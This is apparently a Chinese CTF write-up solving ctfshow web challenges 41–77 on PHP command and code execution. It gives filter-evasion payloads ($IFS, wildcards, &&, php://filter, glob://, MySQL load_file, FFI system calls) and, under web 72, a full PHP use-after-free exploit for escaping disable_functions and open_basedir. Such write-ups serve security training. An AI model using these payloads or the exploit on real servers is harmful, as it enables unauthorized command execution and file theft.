web 41
php代码全部大写,全部小写,部分大小写都是合法的
这题用或运算来计算。这里我们看宇师傅的blog。通过异或构造任意字符
ctfshow web入门 web41_ctfshow web41-CSDN博客
web 42
>/dev/null 2>&1 是一个 shell 重定向操作,意味着命令的标准输出(stdout)和标准错误(stderr)都被重定向到 /dev/null,即被丢弃。c的返回结果不显示
?c=ls;ls双写绕过,把后面的ls写进黑洞里,而前面的c=ls执行
直接?c=tac flag.php;ls
web 43
这题把分号过滤了,用&&
&&是第一个命令执行成功后才执行第二个命令,相当于把命令分割
?c=tac flag.php%26%26ls
web 44
?c=tac fla?.php%26%26ls
web 45
?c=tac%09fla?.php%26%26ls
用其他字符替换掉空格:水平制表符%09,这里的空格不是php代码里面的空格,而是linux中shell里面的空格
web 46 47 48 49
?c=tac%09fla?.php%26%26ls
web 50
使用一个没有空格的命令
?c=nl<flag''php%7C%7Cls
两个单引号编码执行中间自行忽略
web 51
?c=nl<fla''g.php%7C%7Cls
web 52
这里我们用?c=ls||ls发现有一个flag.php
然后尝试复制
?c=cp$IFSfla''g.php$IFSa.txt
失败,尝试重命名
?c=mv${IFS}fla''g.php${IFS}a.txt
但发现一个假的flag,看一下根目录
?c=ls${IFS}/]]ls
发现也有一个flag,移动过去
?c=cp${IFS}/fla''g${IFS}/var/www/html/c.txt||ls
成功
web 53
首先把命令进行显示,再把system的返回结果进行显示
system成功则返回命令的最后一行,失败则返回false
?c=ta''c${IFS}fla?.php
web 54
?c=mv${IFS}fla?.php${IFS}z.txt
web 55
这里给了空格,但过滤了字母。我们尝试bin目录下的可执行程序
?c=/bin/base64 flag.php
用通配符来替换
?c=/???/????64 ????.???
web57
结果需要构造一个36
$(())代表一个数学运算,结果为0
$((-$(())))意思是对-0进行数学计算为-1
构造36就是在$(( ~$(( )) ))里面放37个$((~$(()))),得到-37,取反即可得到36:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
web 58
这里是禁用函数
我们要一个个的尝试
c=echo file_get_contents('flag.php');
成功,文件读取没有被禁用
web 59
上一题的不行了
尝试include(),成功
c=include($_GET[1]);
?1=php://filter/convert.base64-encode/resource=flag.php
web 60
59的方法还可以,还可以
c=highlight_file('flag.php');
web 61
60的方法可以,show_source也可以
web 62
c=include('flag.php');echo $flag;
web 63
上一题的方法可以用
c=include('flag.php');var_dump(get_defined_vars());
包含这个变量,就相当于把flag这个变量给注册进去了,而var_dump(get_defined_vars());是查看所有注册变量。自然就看到flag了
web 64
上一题的可以用
我们查看当前目录
c=print_r(scandir('.'));
现在的方法有:
1.show_source
2.highlight_file
3.文件包含/伪协议
4.日志包含
5.输出注册变量
web 65
这题用show_source('flag.php')可以
web 66
show_source不能用了
highlight_file发现这次的flag不在这里
看一下当前目录
c=var_dump(scandir('.'));
发现不在,前往根目录
c=var_dump(scandir('/'));发现目标
c=highlight_file('/flag.txt');
web 67
上一题的可以用
web 68
从这个题开始用不了highlight_file了
先扫描根目录,发现flag
c=var_dump(scandir('.'));
然后文件包含
c=include('/flag.txt');
web 69 70
上一题的可以用
web 71
这题直接给了源码,没有报错信息
我们可以在代码执行处直接退出
c=include('/flag.txt');exit();
web 72
上一题的不能用了,给了源码
限制了读的权限
用global协议来绕过
c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);?>
这里我们发现有flag0.txt,用include发现不行,
uaf绕过open_basedir安全特性从而可以读取所限制目录下的文件
一个通用的poc 最下方修改我们需要执行的shell命令 需要进行url编码 使用时用脚本内容 不用把<?php带上
<?php
function ctfshow($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
if(!isset($backtrace[1]['args'])) {
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= sprintf("%c",($ptr & 0xff));
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = sprintf("%c",($v & 0xff));
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) {
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) {
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) {
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) {
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10;
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
write($abc, 0x60, 2);
write($abc, 0x70, 6);
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4);
write($abc, 0xd0 + 0x68, $zif_system);
($helper->b)($cmd);
exit();
}
ctfshow("cat /flag0.txt");ob_end_flush();
?>
web 73
用上一个题的解打不通了,这里禁用了strlen()函数
我们先写一个strlen的替代品
//strlen的替代品
function strlen_user($s){
return count(str_split($s));
}
将这个函数插入原来的payload,然后将函数名给替换
但其实这里没这么麻烦,找到文件目录然后
c=include("/flagc.txt");exit(0);
c=require("/flagc.txt");exit(0);
c=require_once("/flagc.txt");exit(0);
就行。
web 74
这里和73相同,只是文件名变成了flagx.txt
web 75
先扫描文件
c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);?>
发现目标为flag36.txt
这里又和73相同了,我们要用其他方式访问文件了。这里不太会
c=
try {
$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');
foreach ($dbh->query('select load_file("/flag36.txt")') as $row) {
echo ($row[0]) . "|";
}
$dbh = null;
} catch (PDOException $e) {
echo $e->getMessage();
exit(0);
}
exit(0);
web 76
这里和35相同,文件名换成了发啦g6d.txt
web 77
这里用不了MySQL了
看别人的解,说php7.4以上可以使用FFI,是指在当前语言中调用另一种语言代码的技术
c=
$ffi=FFI::cdef("int system(const char *command);");
$a='/readflag > 1.txt';
$ffi->system($a);
exit();
上面第一句表示创建一个system对象
第三句通过$ffi去调用system函数
或者用这个:
c=
$ffi=FFI::cdef("int system(const char *command);");
$ffi->system("/readflag > 1.txt");
exit();
参见CTFshow web入门 web71~web77 web118~web122 web124 命令执行_ctfshowweb72-CSDN博客